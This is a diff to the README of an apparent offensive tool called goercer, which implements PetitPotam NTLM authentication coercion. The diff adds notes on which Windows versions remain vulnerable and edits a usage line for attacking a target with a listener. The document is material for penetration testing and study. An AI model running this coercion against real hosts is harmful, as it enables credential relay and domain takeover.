ineffectivecoder/goercer/README.md

 ## 🔥 Enhanced PetitPotam Implementation

+**⚠️ Compatibility Note**: PetitPotam works on **unpatched/partially patched** Windows Server 2016-2022 and Windows 10.
+It is **blocked on fully patched Windows 11 and Server 2025** due to KB5005413 and additional mitigations.
+For fully patched systems, use SpoolSample instead.

-Unlike the original PetitPotam PoC which only tries 2 opnums (0 and 4), this implementation attempts **6 different MS-EFSRPC functions** to maximize success rate:
+Unlike the original PetitPotam PoC which only tries 2 opnums (0 and 4), this implementation attempts **6 different MS-EFSRPC functions** to maximize success rate on vulnerable systems:

 ```bash
 ./goercer -t <target> -l <listener> -u <user> -d <domain> -m petitpotam